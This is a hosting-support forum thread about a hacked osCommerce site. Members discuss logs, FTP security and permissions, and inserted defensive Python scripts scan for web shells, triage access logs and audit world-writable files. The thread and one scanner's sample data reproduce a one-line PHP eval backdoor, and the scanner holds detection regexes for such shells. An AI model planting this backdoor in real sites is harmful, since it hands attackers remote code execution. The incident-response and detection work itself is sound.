Page 1 of 2
Results 1 to 20 of 24

Thread: Site Hack!!

  1. #1
    backinaction is offline Junior Member
    Join Date
    Dec 2009
    Posts
    29

    Default Site Hack!!

    Just this morning I found that every page on my OSC site that is running on EUK has a small google image attached to the bottom of it.

The link takes me to:
    redirect.php?action=banner&goto=2

    The image itself when cut and pasted by location states:
    q_boot.php

    All files were uploaded on the 10th of December. Another file on the root directory of my site is fly.php.

    This suggests to me that I have been hacked via FTP rather than OScommerce and the fly.php script has been run to modify one of the .htaccess files.

    Can anyone tell me how I can get a full log of all ftp log ins on the date in question from EUK as we didn't use FTP at all that day.

    I would also like to block EVERY SINGLE IP address from accessing our FTP except for the only one we use, and perhaps the one our webmaster uses. Is this possible?

  2. #2
    eUK-Ralf's Avatar
    eUK-Ralf is offline Employee
    Join Date
    Apr 2008
    Posts
    217

    Cool

Please contact our support team on Live Chat or place a ticket to support [@] eukhost.com. You may PM me the details of your account registered with us along with the domain name in issue, so that I may look into the issue and get it fixed at the earliest.

  3. #3
    Thomas's Avatar
    Thomas is offline Member
    Join Date
    Dec 2009
    Location
    File Not Found.
    Posts
    92

    Default

    Hi backinaction,

    I have answered your questions below:

    Can anyone tell me how I can get a full log of all ftp log ins on the date in question from EUK as we didn't use FTP at all that day.
You can check your FTP logs under your cPanel with the Webalizer FTP option.

    I would also like to block EVERY SINGLE IP address from accessing our FTP except for the only one we use, and perhaps the one our webmaster uses. Is this possible?
If you are on a Shared server then it won't be possible to block the FTP access of all other users, but if you are on a VPS, Semi-Dedicated or a Dedicated server then you can block FTP access for all other IPs EXCEPT yours and your webmaster's IP address.

Also check whether you have allowed Anonymous FTP access to your website; you can disable anonymous FTP access as well. To disable it, just log in to your cPanel and disable all anonymous connections to your website through the Anonymous FTP option located in your cPanel.

  4. #4
    backinaction is offline Junior Member
    Join Date
    Dec 2009
    Posts
    29

    Default

    Many thanks. Got the FTP log via livechat. There is no other activity except our IP and our webmasters.

    I need to check our webstats for that day but awstats doesn't give any option for viewing all IPs visiting our site on one specific day. It just throws up the entire month in one long list and no tab options for reordering.

  5. #5
    eUK-Ralf's Avatar
    eUK-Ralf is offline Employee
    Join Date
    Apr 2008
    Posts
    217

    Default

    I need to check our webstats for that day but awstats doesn't give any option for viewing all IPs visiting our site on one specific day. It just throws up the entire month in one long list and no tab options for reordering.
    • Login to your cPanel.
    • Click on Awstat under section LOGS.
    • You would have the screen to select the option for domain name statistics.
    • Select the domain name.
    • Under the statistics, click on (Unresolved IP Addresses).

This would give you the complete list of IP addresses that visited your website.

  6. #6
    backinaction is offline Junior Member
    Join Date
    Dec 2009
    Posts
    29

    Default

    I just don't understand how anyone can place files onto the root directory of our web site via OScommerce.

    We had a file "fly.php" added onto the root on the 10th December.

Our web master told us that somebody accessed the banner manager in OScommerce and added banners. Can anyone confirm whether it's possible to do this without leaving any IP behind or needing any kind of FTP access whatsoever?

  7. #7
    eUK-Ralf's Avatar
    eUK-Ralf is offline Employee
    Join Date
    Apr 2008
    Posts
    217

    Cool

    Quote Originally Posted by backinaction View Post
    I just don't understand how anyone can place files onto the root directory of our web site via OScommerce.

    We had a file "fly.php" added onto the root on the 10th December.

    Our web master told us that somebody accessed the banner manager in the OScommerce and added banners. Can anyone confirm if it's possible to do this without leaving any IP behind or not needing any kind of FTP access whatsoever.
    If you could help us with the details of your account, we will investigate the issue further.
    Please contact our support team on Live Chat or place a ticket to support [@] eukhost.com. You may PM me the details of your account registered with us along with the domain name in issue, so that I may look into the issue.

  8. #8
    backinaction is offline Junior Member
    Join Date
    Dec 2009
    Posts
    29

    Default

    Hi,

    I have PMd you. Could you please respond to this as soon as possible because there appears to be more to this than just a simple OSC hack.

  9. #9
    eUK-Ralf's Avatar
    eUK-Ralf is offline Employee
    Join Date
    Apr 2008
    Posts
    217

    Cool

    Quote Originally Posted by backinaction View Post
    Hi,

    I have PMd you. Could you please respond to this as soon as possible because there appears to be more to this than just a simple OSC hack.
    Hi Rob,

We searched the logs on the server for the upload of the fly.php file in your account; however, the logs have been rotated due to the log rotation cron set on the server. I advise you to keep your login credentials private and make the passwords strong, so that hackers cannot crack, guess or assume them.

  10. #10
    backinaction is offline Junior Member
    Join Date
    Dec 2009
    Posts
    29

    Default

    "the logs have been rotated due to the log rotation cron set on the server"

    Sounds painful. What does it mean?

    My passwords have always been strong and secure. Running an OSC web site it goes without saying I would take the utmost protection when it comes to such measures.

However, I need to establish how the hackers have accessed my OScommerce site. As I posted a similar thread on the OSC forums and got a response (which I PMd), perhaps you could clarify this for me.

    The rogue script is running "test<?php @eval($_POST[code]);?>"

    On a properly secure server eval functions are disabled. Why are they not on EUK servers?
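The script quoted in the post above, `test<?php @eval($_POST[code]);?>`, is a one-line backdoor: whatever the attacker sends in the POST body is executed as PHP. What follows is an added example, not code from the thread, from eUKhost or from osCommerce: a scanner that walks a web root, flags PHP files whose source matches that pattern (and two related ones), and reports any file modified after a cutoff date. The sample tree it scans is constructed inside the block by `build_sample_tree()`; only the file names `fly.php` and `q_boot.php` are taken from the thread, their contents are illustrative.

```python
"""Scan a web root for the one-line PHP backdoor quoted in the thread.

Added example, not code from the thread, from eUKhost or from osCommerce.
The post above quotes the dropped file as `test<?php @eval($_POST[code]);?>`,
which runs whatever the attacker sends in a POST body. This scanner walks a
directory, flags PHP files whose source matches that pattern and two related
ones, and also reports any file (PHP or not, .htaccess included) modified
after a cutoff. The sample tree and its contents are constructed here by
build_sample_tree(); only the file names are taken from the thread.
"""
import os
import re
import tempfile
from datetime import datetime, timezone

# Indicator name paired with the regex that detects it.
# The first one is the exact shape quoted in the thread.
SHELL_PATTERNS = [
    ("eval-of-request-input",
     re.compile(r"@?eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b")),
    ("shell-exec-of-request-input",
     re.compile(r"\b(system|passthru|shell_exec|exec|popen)\s*\(\s*\$_(POST|GET|REQUEST)\b")),
    ("eval-of-decoded-payload",
     re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")),
]
PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".inc")


def scan_php_source(path):
    """Return the names of every indicator whose regex matches the file."""
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        src = f.read()
    return [name for name, pat in SHELL_PATTERNS if pat.search(src)]


def scan_webroot(root, modified_after=None):
    """Walk `root`; return {relative path: finding} for each file that matches
    an indicator or was modified after `modified_after` (a Unix timestamp).
    Non-PHP files are only checked for recency; a freshly modified .htaccess
    is one of the changes the thread reports."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            mtime = os.path.getmtime(path)
            hits = scan_php_source(path) if name.lower().endswith(PHP_EXTENSIONS) else []
            recent = modified_after is not None and mtime > modified_after
            if hits or recent:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings[rel] = {
                    "indicators": hits,
                    "modified": datetime.fromtimestamp(mtime, timezone.utc).strftime("%Y-%m-%d"),
                    "recent": recent,
                }
    return findings


def _ts(year, month, day):
    """Unix timestamp for midnight UTC on the given date."""
    return datetime(year, month, day, tzinfo=timezone.utc).timestamp()


# Constructed sample tree: relative path -> (content, mtime). The two dropped
# file names come from the thread; the benign files stand in for a normal root.
SAMPLE_FILES = {
    "index.php": ('<?php $c = $_POST["code"] ?? ""; echo htmlspecialchars($c); ?>', _ts(2009, 11, 1)),
    "includes/application_top.php": ("<?php require 'configure.php'; ?>", _ts(2009, 11, 1)),
    "fly.php": ("test<?php @eval($_POST[code]);?>", _ts(2009, 12, 10)),
    "q_boot.php": ("<?php eval(base64_decode('ZWNobyAxOw==')); ?>", _ts(2009, 12, 10)),
    ".htaccess": ("RewriteEngine On\n", _ts(2009, 12, 10)),
}


def build_sample_tree():
    """Write SAMPLE_FILES into a fresh temp directory with the given mtimes."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, (content, mtime) in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as f:
            f.write(content)
        os.utime(path, (mtime, mtime))
    return root


def demo():
    """Scan the sample tree with a cutoff of 9 Dec 2009, the day before the drop."""
    return scan_webroot(build_sample_tree(), modified_after=_ts(2009, 12, 9))


if __name__ == "__main__":
    for rel, finding in sorted(demo().items()):
        print(f"{rel}: modified {finding['modified']} indicators={finding['indicators']}")
```

Run it against the real document root with the drop date as the cutoff (`scan_webroot("/home/user/public_html", modified_after=_ts(2009, 12, 9))`, path assumed). One caveat worth knowing when a host offers to "disable eval": in PHP `eval` is a language construct, not a function, so the `disable_functions` directive does not cover it; hosts that do switch it off per account typically do so through the Suhosin extension's `suhosin.executor.disable_eval` setting. A content scan like the one above does not depend on which of those is in place.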

  11. #11
    eUK-Ralf's Avatar
    eUK-Ralf is offline Employee
    Join Date
    Apr 2008
    Posts
    217

    Cool

    Quote Originally Posted by backinaction View Post
    "the logs have been rotated due to the log rotation cron set on the server"

    Sounds painful. What does it mean?
The auto-set cron runs on the server, wherein the /var/logs have been updated, so the logs on the server at the moment do not have the details you requested.

    My passwords have always been strong and secure. Running an OSC web site it goes without saying I would take the utmost protection when it comes to such measures.
    It was just a suggestion to keep the passwords strong...

    However, I need to establish how the hackers have accessed my OScommerce site. As I posted a similar thread on the OSC forums and got a response (which I PMd) perhaps you colud clarify this for me.

    The rogue script is running "test<?php @eval($_POST[code]);?>"

    On a properly secure server eval functions are disabled. Why are they not on EUK servers?
On a Shared Server there are multiple accounts hosted on the same server, so different applications are required by different owners to host and run their websites. CMS (Content Management System) applications are required by many accounts hosted on the server to run websites using Joomla, WordPress, Magento, xcart, etc.
It is not possible to disable the EVAL function of PHP on a Shared Server, as it is required by many hosting accounts using CMS applications.

If you wish to have it disabled, you may consider any of the VPS Hosting Plans, wherein you have complete administrative rights to your account. The VPS account is completely private to you and you have complete rights to make changes to any files.

    Click to view our Linux VPS Hosting Plans.

  12. #12
    backinaction is offline Junior Member
    Join Date
    Dec 2009
    Posts
    29

    Default

The solution to almost every problem I have with EUK is nearly always answered with "Upgrade to our virtual servers." It does make me wonder what answer is given to people who have these virtual servers and encounter problems. The trump card having been played, what do you recommend they upgrade to then?

    I do still require more clarification on these logs though. If I had logs of everyone who had accessed the site on the 10th, just 2 days ago, I could perhaps find out how these files got dropped there in the first place.

    Are you saying all of these logs are deleted as a matter of course, or by accident, or what? I don't understand.

  13. #13
    NickJ is offline Chief Technical Officer(eUKhost.com)
    Join Date
    Jun 2007
    Posts
    313

    Default

    The solution to almost every problem I have with EUK is nearly always answered with "Upgrade to our virtual servers." It does make me wonder what answer is given to people who have these virtual servers and encounter problems. The trump card having been played, what do you recommend they upgrade too then?
    No, I don't agree with you.

As Ralf mentioned in his reply, most CMS-based applications require the "eval" function enabled under the PHP configuration and it's not possible to disable it globally on the server.
If you wish, we can disable it for your domain without any problem. But if you need it to be disabled server-side, then you will need to consider a dedicated environment, as it's not possible under a shared environment.

We do have our own security policies, including a web-based firewall, which conflict with most of your (client hosted on the server) applications, and we will have to provide you with a workaround for it. The suggestion of a VPS is just a workaround.

    I do still require more clarification on these logs though. If I had logs of everyone who had accessed the site on the 10th, just 2 days ago, I could perhaps find out how these files got dropped there in the first place.

    Are you saying all of these logs are deleted as a matter of course, or by accident, or what? I don't understand.
We have FTP/cPanel logs for the last 4 weeks for all accounts hosted on this server and I am not able to locate any instance where the file was uploaded via FTP or through cPanel under your account.

The other way to upload it is through some script under your account, and the logs for that are saved under the domlogs file. This domlogs file gets rotated every day once the stats run. This is why we do not have the logs for it.

You might be able to find the entry for the file under your domain's stats for 10th Dec.
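The post above explains that requests made through a script under the account land in the domain's domlogs file and that this file is rotated daily once stats run. What follows is an added example, not code from the thread or from eUKhost, of the pass a practitioner would run over that file before rotation: it parses Apache "combined" format lines, keeps only the requested day, and reports requests per IP, every hit on the dropped file names, and POST requests to PHP scripts, since a backdoor of the `@eval($_POST[code])` kind is driven entirely by POSTs. The log lines inside the block are constructed for the demo and use documentation-range IP addresses, not addresses from the incident; the domlogs path in the usage note is the usual cPanel location and is an assumption.

```python
"""Triage one day of an Apache access log after a file drop.

Added example, not code from the thread or from eUKhost. It parses Apache
"combined" format lines (what cPanel keeps in the per-domain domlogs file),
keeps only the requested day, and reports requests per IP, hits on the
dropped file names from the thread, and POST requests to PHP scripts.
The log lines below are constructed for the demo and use documentation
address ranges (203.0.113.0/24, 198.51.100.0/24, 192.0.2.0/24).
"""
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit

# Apache "combined" format:
# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log: one visitor drops and drives the shell, one ordinary
# shopper, and a next-day request that must be excluded by the date filter.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2009:03:12:41 +0000] "GET /index.php HTTP/1.1" 200 8342 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2009:03:13:05 +0000] "POST /admin/banner_manager.php?action=insert HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2009:03:13:09 +0000] "GET /images/q_boot.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2009:03:14:07 +0000] "POST /fly.php HTTP/1.1" 200 61 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Dec/2009:09:01:44 +0000] "GET /product_info.php?products_id=31 HTTP/1.1" 200 14220 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Dec/2009:09:02:10 +0000] "GET /redirect.php?action=banner&goto=2 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.44 - - [11/Dec/2009:12:00:00 +0000] "POST /fly.php HTTP/1.1" 200 61 "-" "curl/7.19.7"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["date"] = rec["ts"].split(":", 1)[0]      # e.g. "10/Dec/2009"
    rec["path"] = urlsplit(rec["target"]).path    # path without the query string
    return rec


def triage(lines, day, dropped=("fly.php", "q_boot.php")):
    """Summarise one day: requests per IP, hits on the dropped file names
    (in any directory), and POSTs to PHP scripts grouped by source IP."""
    per_ip = Counter()
    dropped_hits = []
    posts_to_php = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["date"] != day:
            continue
        per_ip[rec["ip"]] += 1
        if rec["path"].rsplit("/", 1)[-1] in dropped:
            dropped_hits.append((rec["ts"], rec["ip"], rec["method"], rec["path"], rec["status"]))
        if rec["method"] == "POST" and rec["path"].lower().endswith(".php"):
            posts_to_php[rec["ip"]].append(rec["path"])
    return {
        "per_ip": dict(per_ip),
        "dropped_hits": dropped_hits,
        "posts_to_php": dict(posts_to_php),
    }


def demo():
    """Run the triage over the constructed log for the day of the drop."""
    return triage(SAMPLE_LOG.splitlines(), "10/Dec/2009")


if __name__ == "__main__":
    report = demo()
    for ip, n in sorted(report["per_ip"].items(), key=lambda kv: -kv[1]):
        print(f"{ip}: {n} requests, POSTs to PHP: {report['posts_to_php'].get(ip, [])}")
    for hit in report["dropped_hits"]:
        print("dropped-file hit:", *hit)
```

Against a live account this is `triage(open("/usr/local/apache/domlogs/example.com").read().splitlines(), "10/Dec/2009")` (the path is the usual cPanel one and assumed here). Because the file is rotated when stats run, it is also worth checking whether cPanel's Raw Access Logs option to archive logs in the home directory is switched on for the account; if it is, the rotated copies survive there.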

  14. #14
    backinaction is offline Junior Member
    Join Date
    Dec 2009
    Posts
    29

    Default

Thank you, Nick J, for answering my question head on. This is the information I needed, so I know how to proceed. Removing FTP and your own servers from the equation, I know where to focus my attention on security. This is what I've been trying to establish all day.

    Regarding, eval:-

    "If you wish, we can disable it for your domain on without any problem."

    Please can you, that would be great.

  15. #15
    NickJ is offline Chief Technical Officer(eUKhost.com)
    Join Date
    Jun 2007
    Posts
    313

    Default

    Hello,

    The "eval" function has been disabled for your domain..

  16. #16
    backinaction is offline Junior Member
    Join Date
    Dec 2009
    Posts
    29

    Default

    Thanks Nick, but we seem to have a new problem now.

We changed our FTP password/login details the moment we had deleted all these rogue files. We looked at our FTP Webalizer today and there is an IP address listed in Beijing that we have never seen before and know nothing about. They have accessed our site via FTP and uploaded files onto our server.

    Our laptops have been thoroughly scanned with no traces of a virus. So how is it remotely possible they could have obtained our FTP login details????? We asked livehelp but they didn't know.

    The only people with the new login details are ourselves. No-one, not even our web designers have the new details.

We have opened two tickets so far. One to have the site rolled back to a date in November and the other to block Chinese IP addresses from accessing our files. The rollback is the most important. Livechat were overly optimistic by telling us it would take half an hour, so if you have any idea on how and when it can be done please let me know.

  17. #17
    backinaction is offline Junior Member
    Join Date
    Dec 2009
    Posts
    29

    Default

    Okay now I'm confused.
Ronnie V at Livehelp told us we could block Chinese IPs through FTP. He told us to open a ticket. We did, and Max T told us we couldn't.

    Yet again Livehelp proving they are the weakest link when it comes to EUK customer service.

    That's why I have to keep using these forums, as livehelp are so bad.

    It's been 2 hours since Livehelp told us they would rollback our site, even though they told us it would take half an hour. When we ask again why it hasn't been done they said "Our admin working on your issue". We can excuse the remedial English as it's par for the course with Livehelp, but why do they insist on giving timeframes that are a million miles short of the results.

  18. #18
    MaFtuk is offline Member
    Join Date
    Oct 2009
    Posts
    59

    Default

    Quote Originally Posted by backinaction View Post
    The solution to almost every problem I have with EUK is nearly always answered with "Upgrade to our virtual servers."

If you share a house with 5 other people it will keep costs down dramatically, but with the downside being that you need to keep everybody happy, or at least the majority. Likewise for servers: if you want it cheap then you go shared; if you want it exactly to your liking then get your own house (SD / D) or at least rent one (VPS).

    MaFt

  19. #19
    sihost is offline Senior Member
    Join Date
    Jul 2009
    Posts
    244

    Default

From my research over the last few months on the security of our dedicated server (previously VPS):

    FTP
Standard FTP is insecure as it sends logins and passwords in plain text, so however secure they are, they can be intercepted 'in transit'; and don't forget, many users use their master cPanel passwords to access FTP. So once the FTP password and login are obtained by a 3rd party, they can log into your cPanel.
Much like sending your credit card details through an online shop without security.

    FTP SSL
    Sometimes called Explicit FTPS
This still uses port 21 but obtains a secure connection, so your login and password are encrypted; works well with FileZilla, not with some clients. Jailshell need not be turned on. This is best for those who want to access specific FTP folders set up in cPanel or main master password access. (Easier to explain to customers!)

    SFTP SSH
The best and most secure; this sends the FTP transfer through a secure SSH connection, port 22 (or custom), but can only be used with root access to each account (not FTP folders set up in cPanel). The port can also be moved to a non-standard port to evade port scans. Dreamweaver supports this well by entering ftp.domain.com:portnumber

In all cases, make your passwords very, very secure and, if you are a VPS customer or reseller with WHM, enforce passwords to be at least 85% secure and turn on brute force protection, setting the limits lower than the default.

More related to this discussion: it doesn't look like the site was hacked through FTP, but I wonder if they gained cPanel access and uploaded through File Manager?

Or it's a PHP script with 777 permissions in a form with an upload button or image upload. This depends on whether you are using suPHP Apache on your server though; if you are, this helps prevent this kind of activity.

    Hope you get it sorted
    Last edited by sihost; 05-01-2010 at 01:54.

  20. #20
    eUK-Victor's Avatar
    eUK-Victor is offline Linux Support Team(eUKhost.com)
    Join Date
    Aug 2007
    Posts
    186

    Default

    Hello,

    Yes, I agree with you.

The most important thing is that one should keep cPanel/FTP usernames and passwords strong enough so that hackers cannot compromise them easily. Passwords should be a combination of alphanumeric characters and a few special characters like ~ ! @ # $ % ^ & * { } + / , etc., and also do keep changing passwords at regular intervals for security reasons.

Never set the permissions of files/folders to world-writable [777] unless it's necessary, so that no one can write into them.

Also, taking a regular backup of your account from the cPanel backup option is a good habit and will be a great advantage in any disaster case like an account hack, hardware crash, etc.

Regarding shell access, we have a few servers on which we do allow jailshell access, and we always migrate the accounts of those clients who need jailshell access.
    Regards,
    Victor,
    Support Team.
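Both sihost's post and Victor's reply above point at 777 permissions as the usual way an upload form turns into a dropper: a directory anyone can write to, from which the web server will also execute PHP, is where a file like fly.php gets planted. What follows is an added example, not code from the thread or from eUKhost, of the audit a practitioner would run over the document root: it walks the tree, lists every directory and file with the "other" write bit set, shows which PHP files already sit inside a world-writable directory, and can clear that bit. The tree it inspects is constructed inside the block; the file names echo the thread and the contents are placeholders.

```python
"""Find (and strip) world-writable permissions under a web root.

Added example, not code from the thread or from eUKhost. It walks a tree,
reports every directory and file with the other-write bit (stat.S_IWOTH) set,
lists PHP files already sitting in a world-writable directory, and can clear
the bit. The sample tree is constructed by build_sample_tree(); the names
fly.php and q_boot.php come from the thread, everything else is a stand-in.
"""
import os
import shutil
import stat
import tempfile

PHP_EXTENSIONS = (".php", ".phtml", ".php5")


def _rel(path, root):
    """Path relative to root with forward slashes; "" for the root itself."""
    rel = os.path.relpath(path, root).replace(os.sep, "/")
    return "" if rel == "." else rel


def is_world_writable(path):
    """True when the 'other' write bit is set on a real file or directory.
    Symlinks are skipped: their own mode is meaningless and the target is
    judged wherever it actually lives."""
    if os.path.islink(path):
        return False
    return bool(os.lstat(path).st_mode & stat.S_IWOTH)


def audit_permissions(root):
    """Return sorted lists of world-writable dirs and files (relative paths)
    plus, for each world-writable dir, the PHP files already inside it."""
    report = {"dirs": [], "files": [], "php_in_writable_dirs": {}}
    for dirpath, _dirnames, filenames in os.walk(root):
        if is_world_writable(dirpath):
            rel_dir = _rel(dirpath, root)
            report["dirs"].append(rel_dir)
            php = sorted(f for f in filenames if f.lower().endswith(PHP_EXTENSIONS))
            if php:
                report["php_in_writable_dirs"][rel_dir] = php
        for name in filenames:
            path = os.path.join(dirpath, name)
            if is_world_writable(path):
                report["files"].append(_rel(path, root))
    report["dirs"].sort()
    report["files"].sort()
    return report


def remove_world_write(root):
    """Clear the other-write bit on every flagged entry; return how many changed."""
    changed = 0
    for dirpath, _dirnames, filenames in os.walk(root):
        for path in [dirpath] + [os.path.join(dirpath, n) for n in filenames]:
            if is_world_writable(path):
                mode = stat.S_IMODE(os.lstat(path).st_mode)
                os.chmod(path, mode & ~stat.S_IWOTH)
                changed += 1
    return changed


# Constructed sample tree: relative path -> mode. Entries ending in "/" are dirs.
SAMPLE_TREE = {
    "images/": 0o777,             # the classic upload directory left at 777
    "images/q_boot.php": 0o644,   # a PHP file sitting where anyone may write
    "images/logo.gif": 0o644,
    "includes/": 0o755,
    "includes/configure.php": 0o644,
    "tmp/": 0o777,
    "fly.php": 0o666,             # a world-writable file in the root
    "index.php": 0o644,
}


def build_sample_tree():
    """Create SAMPLE_TREE in a fresh temp directory and apply the modes."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, mode in SAMPLE_TREE.items():
        path = os.path.join(root, rel.rstrip("/"))
        if rel.endswith("/"):
            os.makedirs(path, exist_ok=True)
        else:
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as f:
                f.write("placeholder\n")
        os.chmod(path, mode)
    return root


def demo():
    """Audit the sample tree, fix it, audit again; returns (before, changed, after)."""
    root = build_sample_tree()
    try:
        before = audit_permissions(root)
        changed = remove_world_write(root)
        after = audit_permissions(root)
    finally:
        shutil.rmtree(root)
    return before, changed, after


if __name__ == "__main__":
    before, changed, after = demo()
    print("world-writable dirs:", before["dirs"])
    print("world-writable files:", before["files"])
    print("PHP inside writable dirs:", before["php_in_writable_dirs"])
    print(f"cleared the bit on {changed} entries; remaining: {after['dirs'] + after['files']}")
```

Run `audit_permissions` on its own first and read the `php_in_writable_dirs` entries before fixing anything: a PHP file inside a world-writable directory that the application never writes to is the combination worth investigating, not just tidying. Under suPHP, scripts run as the account owner, so the application's own upload directory does not need to be 777 at all; 755 with the owner matching the PHP user is enough.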

